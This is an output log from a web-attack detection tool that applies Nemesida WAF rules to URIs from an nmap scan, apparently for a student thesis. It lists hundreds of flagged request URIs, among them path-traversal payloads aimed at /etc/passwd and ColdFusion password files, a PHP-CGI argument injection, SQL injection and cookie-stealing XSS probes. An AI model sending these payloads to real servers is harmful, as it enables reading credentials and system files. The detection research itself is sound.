# inspectorlog v3.5
#----- Initializing Rules (NEMESIDA)  ---------------------
#	Opening NEMESIDA rule file /home/kali/Downloads/reglas_javi/nemesida/nemesida-rules-bin-20220109.txt...
#		Rules: read [506], erroneous [0], URI (URL|ARGS) [449]
#-----  Statistics (NEMESIDA) ------------------------------
# Read [506] nemesida rules, [449] http-related, [0] with errors
#----- Analysis results ----------------------------
# Alerts & signatures generated from: /home/kali/Downloads/inspectorlog/inspectorlog -l nmap.short -m /home/kali/Downloads/reglas_javi/nemesida/nemesida-rules-bin-20220109.txt -t list -o /home/kali/TFG/ficheros_uris_completos/web_dinamica/nemesida/nmap_short.clean
Packet [1]	Uri [%2E%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001559]
Packet [2]	Uri [%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fboot%2Eini]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001517]
Packet [3]	Uri [%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001559]
Packet [4]	Uri [%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5Cboot%2Eini]	Nattacks [3]	Signatures	[300000057]	[300000071]	[300001517]
Packet [5]	Uri [%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5Cetc%5Cpasswd]	Nattacks [2]	Signatures	[300000057]	[300000071]
Packet [6]	Uri [%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2Fetc%5C%2Fpasswd]	Nattacks [1]	Signatures	[300000057]
Packet [7]	Uri [%2F%2Fetc%2Fpasswd]	Nattacks [1]	Signatures	[300001559]
Packet [8]	Uri [%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/boot.ini]	Nattacks [1]	Signatures	[300001517]
Packet [9]	Uri [%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./boot.ini]	Nattacks [1]	Signatures	[300001517]
Packet [10]	Uri [..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/var/mobile/Library/AddressBook/AddressBook.sqlitedb]	Nattacks [2]	Signatures	[300000057]	[300000067]
Packet [11]	Uri [..\\..\\..\..\\..\..\\..\..\\\boot.ini]	Nattacks [4]	Signatures	[300000057]	[300000066]	[300000071]	[300001517]
Packet [24]	Uri [/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini]	Nattacks [3]	Signatures	[300000057]	[300000071]	[300001517]
Packet [25]	Uri [/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc%2fpasswd]	Nattacks [3]	Signatures	[300000057]	[300000071]	[300001559]
Packet [26]	Uri [/%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\boot.ini]	Nattacks [1]	Signatures	[300001517]
Packet [27]	Uri [/..%5C..%5C%5C..%5C..%5C%5C..%5C..%5C%5C..%5C..%5Cboot.ini]	Nattacks [4]	Signatures	[300000057]	[300000066]	[300000071]	[300001517]
Packet [28]	Uri [/../../../../../../../../../../boot.ini]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001517]
Packet [29]	Uri [/../../../../../../../../../../etc/passwd]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001559]
Packet [30]	Uri [/../../../../../../../etc/passwd]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001559]
Packet [31]	Uri [/..\..\..\..\\..\..\\..\..\\\boot.ini]	Nattacks [4]	Signatures	[300000057]	[300000066]	[300000071]	[300001517]
Packet [32]	Uri [/..\/..\/..\/boot.ini]	Nattacks [2]	Signatures	[300000057]	[300001517]
Packet [33]	Uri [/..\/\..\/\..\/\boot.ini]	Nattacks [2]	Signatures	[300000057]	[300001517]
Packet [34]	Uri [/.bzr/README]	Nattacks [1]	Signatures	[300001506]
Packet [36]	Uri [/.git/HEAD]	Nattacks [1]	Signatures	[300001506]
Packet [37]	Uri [/.gitignore]	Nattacks [1]	Signatures	[300001506]
Packet [38]	Uri [/.hg/requires]	Nattacks [1]	Signatures	[300001506]
Packet [39]	Uri [/.hgignore]	Nattacks [1]	Signatures	[300001506]
Packet [40]	Uri [/.htaccess]	Nattacks [1]	Signatures	[300001847]
Packet [41]	Uri [/.htpasswd]	Nattacks [1]	Signatures	[300001846]
Packet [42]	Uri [/.nsf/../winnt/win.ini]	Nattacks [2]	Signatures	[300000067]	[300001517]
Packet [43]	Uri [/.svn/]	Nattacks [1]	Signatures	[300001506]
Packet [44]	Uri [/.svn/text-base/.htaccess.svn-base]	Nattacks [2]	Signatures	[300001506]	[300001847]
Packet [45]	Uri [/.svn/text-base/.htpasswd.svn-base]	Nattacks [2]	Signatures	[300001506]	[300001846]
Packet [46]	Uri [/.svn/text-base/Web.config.svn-base]	Nattacks [1]	Signatures	[300001506]
Packet [47]	Uri [///..%2f..%2f..%2f..%2fboot.ini]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001517]
Packet [48]	Uri [////..\..\..\boot.ini]	Nattacks [3]	Signatures	[300000057]	[300000071]	[300001517]
Packet [49]	Uri [//cmdownloads/?CMDsearch=%22.base64_decode%28%22bGxieXpvcXV6Y3JzcGVq%22%29.%22]	Nattacks [2]	Signatures	[300001031]	[300002400]
Packet [50]	Uri [//cmdownloads/?CMDsearch=%22.base64_decode%28%22YW5idWViem5yb2l3aGVy%22%29.%22]	Nattacks [2]	Signatures	[300001031]	[300002400]
Packet [54]	Uri [/1.sql]	Nattacks [1]	Signatures	[300001526]
Packet [67]	Uri [/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input]	Nattacks [2]	Signatures	[300001318]	[300001834]
Packet [70]	Uri [/?p4yl04d2=1%20UNION%20ALL%20SELECT%201,2,3,table_name%20FROM%20information_schema.tables,/?p4yl04d3=<script>alert(document.cookie)</script>]	Nattacks [9]	Signatures	[300000053]	[300000508]	[300000515]	[300000537]	[300000550]	[300001042]	[300001086]	[300001109]	[300001116]
Packet [71]	Uri [/?p4yl04d=../../../../../../../../../../../../../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [73]	Uri [/?parameter=%3Cscript%3Ealert%281%29%3C%2Fscript%3E]	Nattacks [3]	Signatures	[300000508]	[300000515]	[300000537]
Packet [74]	Uri [/?parameter=../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [76]	Uri [/?parameter=<script>alert(1)</script>]	Nattacks [3]	Signatures	[300000508]	[300000515]	[300000537]
Packet [93]	Uri [/account.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [95]	Uri [/account.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [105]	Uri [/adm.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [107]	Uri [/adm.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [113]	Uri [/adm/admloginuser.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [114]	Uri [/adm/admloginuser.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [119]	Uri [/adm/index.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [121]	Uri [/adm/index.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [124]	Uri [/adm/index.php,/adm.php,/affiliate.php,/adm_auth.php,/memberadmin.php,/administratorlogin.php,/account.cfm,/admin/account.cfm,/admin/index.cfm,/admin/login.cfm,/admin/admin.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [131]	Uri [/admin-login.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [133]	Uri [/admin-login.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [137]	Uri [/admin.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [138]	Uri [/admin.cfm,/admin/admin_login.cfm,/admin_login.cfm,/adminpanel.cfm,/admin/controlpanel.cfm,/admincontrol.cfm,/panel-administracion/login.cfm,/admin/cp.cfm,/pages/admin/admin-login.cfm,/admincp/index.cfm,/admincp/login.cfm,/admin_area/admin.cfm,/admin_area/login.cfm,/moderator/login.cfm,/administrator/login.cfm,/moderator.cfm,/modelsearch/index.cfm,/panel-administracion/admin.cfm,/adm/admloginuser.cfm,/adm.cfm,/adm_auth.cfm,/administratorlogin.cfm,/webadmin.cfm,/webadmin/index.cfm,/modelsearch/login.cfm,/login.cfm,/administrator.cfm,/administrator/account.cfm,/adminLogin.cfm,/siteadmin/login.cfm,/admin2/index.cfm,/adm/index.cfm,/admin_area/index.cfm,/bb-admin/index.cfm,/bb-admin/login.cfm,/bb-admin/admin.cfm,/siteadmin/index.cfm,/memberadmin.cfm,/admin2/login.cfm,/admloginuser.cfm,/admincontrol/login.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [140]	Uri [/admin.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [147]	Uri [/admin/account.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [149]	Uri [/admin/account.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [153]	Uri [/admin/admin-login.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [155]	Uri [/admin/admin-login.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [159]	Uri [/admin/admin.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [161]	Uri [/admin/admin.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [166]	Uri [/admin/adminLogin.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [168]	Uri [/admin/adminLogin.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [172]	Uri [/admin/admin_login.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [174]	Uri [/admin/admin_login.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [176]	Uri [/admin/backup/]	Nattacks [1]	Signatures	[300002856]
Packet [180]	Uri [/admin/controlpanel.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [182]	Uri [/admin/controlpanel.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [186]	Uri [/admin/cp.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [188]	Uri [/admin/cp.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [189]	Uri [/admin/cp.jsp,/cp.jsp,/administrator/account.jsp,/administrator.jsp,/login.jsp,/modelsearch/login.jsp,/moderator.jsp,/moderator/login.jsp,/administrator/login.jsp,/moderator/admin.jsp,/controlpanel.jsp,/user.jsp,/admincp/index.jsp,/admincp/login.jsp,/admincontrol.jsp,/admin/account.jsp,/adminpanel.jsp,/webadmin.jsp,/webadmin/index.jsp,/webadmin/admin.jsp,/webadmin/login.jsp,/admin/admin_login.jsp,/admin_login.jsp,/panel-administracion/login.jsp,/adminLogin.jsp,/admin/adminLogin.jsp,/home.jsp,/adminarea/index.jsp,/adminarea/admin.jsp,/adminarea/login.jsp,/panel-administracion/index.jsp,/panel-administracion/admin.jsp,/modelsearch/index.jsp,/modelsearch/admin.jsp,/administrator/index.jsp,/admincontrol/login.jsp,/adm/admloginuser.jsp,/admloginuser.jsp,/admin2.jsp,/admin2/login.jsp,/admin2/index.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [191]	Uri [/admin/download/backup.sql]	Nattacks [1]	Signatures	[300001526]
Packet [195]	Uri [/admin/home.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [197]	Uri [/admin/home.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [203]	Uri [/admin/index.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [205]	Uri [/admin/index.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [211]	Uri [/admin/jscript/upload.pl]	Nattacks [1]	Signatures	[300001513]
Packet [215]	Uri [/admin/login.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [218]	Uri [/admin/login.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [265]	Uri [/admin2.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [269]	Uri [/admin2/index.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [270]	Uri [/admin2/index.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [274]	Uri [/admin2/login.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [275]	Uri [/admin2/login.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [282]	Uri [/adminarea/admin.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [285]	Uri [/adminarea/admin.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [290]	Uri [/adminarea/index.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [292]	Uri [/adminarea/index.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [296]	Uri [/adminarea/login.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [298]	Uri [/adminarea/login.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [302]	Uri [/admincontrol.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [304]	Uri [/admincontrol.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [308]	Uri [/admincontrol/login.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [310]	Uri [/admincontrol/login.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [315]	Uri [/admincp/index.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [317]	Uri [/admincp/index.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [320]	Uri [/admincp/login.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [321]	Uri [/admincp/login.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [326]	Uri [/administr8.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [327]	Uri [/administr8.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [332]	Uri [/administracao.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [333]	Uri [/administracao.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [339]	Uri [/administracion.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [340]	Uri [/administracion.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [347]	Uri [/administrator.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [349]	Uri [/administrator.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [355]	Uri [/administrator/account.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [357]	Uri [/administrator/account.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [361]	Uri [/administrator/index.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [364]	Uri [/administrator/index.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [368]	Uri [/administrator/login.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [370]	Uri [/administrator/login.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [376]	Uri [/administratorlogin.aspx,/siteadmin/login.aspx,/siteadmin/index.aspx,/account.jsp,/admin/index.jsp,/admin/login.jsp,/admin/admin.jsp,/admin_area/admin.jsp,/admin_area/login.jsp,/admin_area/index.jsp,/bb-admin/index.jsp,/bb-admin/login.jsp,/bb-admin/admin.jsp,/admin/home.jsp,/admin/controlpanel.jsp,/admin.jsp,/pages/admin/admin-login.jsp,/admin/admin-login.jsp,/admin-login.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [377]	Uri [/administratorlogin.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [378]	Uri [/administratorlogin.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [386]	Uri [/AdminLogin.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [387]	Uri [/adminLogin.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [389]	Uri [/AdminLogin.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [390]	Uri [/adminLogin.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [391]	Uri [/AdminLogin.jsp,/AdminLogin.aspx,/AdminLogin.cfm,/admin108/,/pec_admin/,/system/admin/,/plog-admin/,/ESAdmin/,/axis2-admin/,/_sys/,/admin_cp.asp,/sitecore/admin/,/sitecore/login/admin/,/backup/,/backup,/backup.sql,/backup.sql.gz,/backup.sql.bz2,/backup.zip,/backups/,/bak/,/back/,/cache/backup/,/admin/backup/,/dbbackup.txt,/b.sql,/db.sql,/ddb.sql,/users.sql,/database.sql,/mysql.sql,/dump.sql,/respaldo.sql,/data.sql,/old.sql,/usuarios.sql,/bdb.sql,/1.sql,/admin/download/backup.sql,/clientaccesspolicy.xml,/atom/,/atom.aspx,/atom.php]	Nattacks [1]	Signatures	[300002856]
Packet [397]	Uri [/adminpanel.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [400]	Uri [/adminpanel.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [405]	Uri [/admins.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [406]	Uri [/admins.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [412]	Uri [/admin_area/admin.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [414]	Uri [/admin_area/admin.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [418]	Uri [/admin_area/index.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [420]	Uri [/admin_area/index.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [424]	Uri [/admin_area/login.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [426]	Uri [/admin_area/login.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [431]	Uri [/admin_login.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [433]	Uri [/admin_login.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [438]	Uri [/admloginuser.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [439]	Uri [/admloginuser.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [443]	Uri [/adm_auth.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [444]	Uri [/adm_auth.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [495]	Uri [/atom.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [498]	Uri [/atom.xml,/atom.jsp,/rss/,/rss.aspx,/rss.php,/rss.xml,/rss.jsp,/etc/passwd,/boot.ini,/example/,/examples/,/iissamples/,/j2eeexamples/,/j2eeexamplesjsp/,/sample/,/ncsample/,/fpsample/,/cmsample/,/samples/,/mono/1.1/index.aspx,/login/,/login.htm,/login.jsp,/test.asp,/test.class,/test/,/test.htm,/test.html,/test.php,/test.txt,/webmail/,/mail/,/log/,/log.htm,/log.php,/log.asp,/log.aspx,/log.jsp,/logs/,/logs.htm,/logs.php,/logs.asp,/logs.aspx,/logs.jsp]	Nattacks [2]	Signatures	[300001516]	[300001559]
Packet [517]	Uri [/axis2/axis2-web/HappyAxis.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [522]	Uri [/b.sql]	Nattacks [1]	Signatures	[300001526]
Packet [529]	Uri [/backup.sql]	Nattacks [1]	Signatures	[300001526]
Packet [530]	Uri [/backup.sql.bz2]	Nattacks [2]	Signatures	[300001519]	[300002752]
Packet [531]	Uri [/backup.sql.gz]	Nattacks [2]	Signatures	[300001519]	[300002752]
Packet [532]	Uri [/backup.zip]	Nattacks [1]	Signatures	[300002752]
Packet [533]	Uri [/backup/]	Nattacks [1]	Signatures	[300002856]
Packet [552]	Uri [/bb-admin/admin.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [554]	Uri [/bb-admin/admin.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [558]	Uri [/bb-admin/index.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [560]	Uri [/bb-admin/index.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [564]	Uri [/bb-admin/login.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [566]	Uri [/bb-admin/login.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [572]	Uri [/bdb.sql]	Nattacks [1]	Signatures	[300001526]
Packet [596]	Uri [/boot.ini]	Nattacks [1]	Signatures	[300001517]
Packet [616]	Uri [/cache/backup/]	Nattacks [1]	Signatures	[300002856]
Packet [619]	Uri [/cacti/,/zabbix/,/extrahop/,/nagios/,/console/,/manager/html/,/manager/status/,/manager/text/,/tomcat/manager/html/,/tomcat/manager/status/,/tomcat/manager/text/,/cognos_express/manager/html/,/host-manager/html/,/host-manager/text/,/tomcat/host-manager/html/,/tomcat/host-manager/text/,/system/console,/lc/system/console,/axis2/axis2-admin/,/ui/authentication/,/admin,/logo_t.gif,/view/viewer_index.shtml,/PSIA/Custom/SelfExt/userCheck,/server/TCPIPGEN.htm,/api/id/,/login.html]	Nattacks [1]	Signatures	[300001901]
Packet [657]	Uri [/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/analyzer/index.cfm&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001516]
Packet [658]	Uri [/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=../../../../../../../../../opt/coldfusion/cfusion/lib/password.properties&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001516]
Packet [659]	Uri [/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=../../../../../../../../../opt/coldfusion10/cfusion/lib/password.properties&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001516]
Packet [660]	Uri [/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=../../../../../../../../../opt/coldfusion9/cfusion/lib/password.properties&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001516]
Packet [661]	Uri [/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=../../lib/password.properties&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001516]
Packet [662]	Uri [/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=..\..\..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp]	Nattacks [5]	Signatures	[300000057]	[300000067]	[300000071]	[300001145]	[300001516]
Packet [663]	Uri [/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=..\..\..\..\..\..\..\..\..\ColdFusion10\cfusion\lib\password.properties&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp]	Nattacks [5]	Signatures	[300000057]	[300000067]	[300000071]	[300001145]	[300001516]
Packet [664]	Uri [/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=..\..\..\..\..\..\..\..\..\ColdFusion10\lib\password.properties&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp]	Nattacks [5]	Signatures	[300000057]	[300000067]	[300000071]	[300001145]	[300001516]
Packet [665]	Uri [/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=..\..\..\..\..\..\..\..\..\ColdFusion9\cfusion\lib\password.properties&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp]	Nattacks [5]	Signatures	[300000057]	[300000067]	[300000071]	[300001145]	[300001516]
Packet [666]	Uri [/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=..\..\..\..\..\..\..\..\..\ColdFusion9\lib\password.properties&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp]	Nattacks [5]	Signatures	[300000057]	[300000067]	[300000071]	[300001145]	[300001516]
Packet [667]	Uri [/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=..\..\lib\password.properties&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp]	Nattacks [5]	Signatures	[300000057]	[300000067]	[300000071]	[300001145]	[300001516]
Packet [668]	Uri [/CFIDE/administrator/archives/index.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [669]	Uri [/CFIDE/administrator/enter.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [670]	Uri [/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en]	Nattacks [5]	Signatures	[300000057]	[300000071]	[300001145]	[300001359]	[300001516]
Packet [671]	Uri [/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX7\lib\password.properties%00en]	Nattacks [5]	Signatures	[300000057]	[300000071]	[300001145]	[300001359]	[300001516]
Packet [672]	Uri [/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX\lib\password.properties%00en]	Nattacks [5]	Signatures	[300000057]	[300000071]	[300001145]	[300001359]	[300001516]
Packet [673]	Uri [/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties%00en]	Nattacks [5]	Signatures	[300000057]	[300000071]	[300001145]	[300001359]	[300001516]
Packet [674]	Uri [/CFIDE/administrator/entman/index.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [677]	Uri [/CFIDE/componentutils/login.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [678]	Uri [/cfide/install.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [679]	Uri [/CFIDE/wizards/common/_logintowizard.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [684]	Uri [/cgi-bin/awstats.pl]	Nattacks [1]	Signatures	[300001513]
Packet [688]	Uri [/cgi-bin/ffileman.cgi?]	Nattacks [1]	Signatures	[300001513]
Packet [692]	Uri [/cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [700]	Uri [/cgi-mod/index.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [701]	Uri [/cgi-mod/smtp_test.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [702]	Uri [/cgi-mod/view_help.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [737]	Uri [/client/VMware-viclient.exe]	Nattacks [1]	Signatures	[300001562]
Packet [779]	Uri [/console/login/loginForm.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [787]	Uri [/controlpanel.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [789]	Uri [/controlpanel.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [798]	Uri [/cp.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [800]	Uri [/cp.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [823]	Uri [/CuteSoft_Client/CuteEditor/Load.ashx?type=image&file=../../../web.config]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [827]	Uri [/cwhp/auditLog.do?file=..\..\..\..\..\..\..\boot.ini]	Nattacks [3]	Signatures	[300000057]	[300000071]	[300001145]
Packet [828]	Uri [/cwhp/auditLog.do?file=..\..\..\..\..\..\..\Program%20Files\CSCOpx\lib\classpath\com\cisco\nm\cmf\dbservice2\DBServer.properties]	Nattacks [3]	Signatures	[300000057]	[300000071]	[300001145]
Packet [829]	Uri [/cwhp/auditLog.do?file=..\..\..\..\..\..\..\Program%20Files\CSCOpx\log\dbpwdChange.log]	Nattacks [3]	Signatures	[300000057]	[300000071]	[300001145]
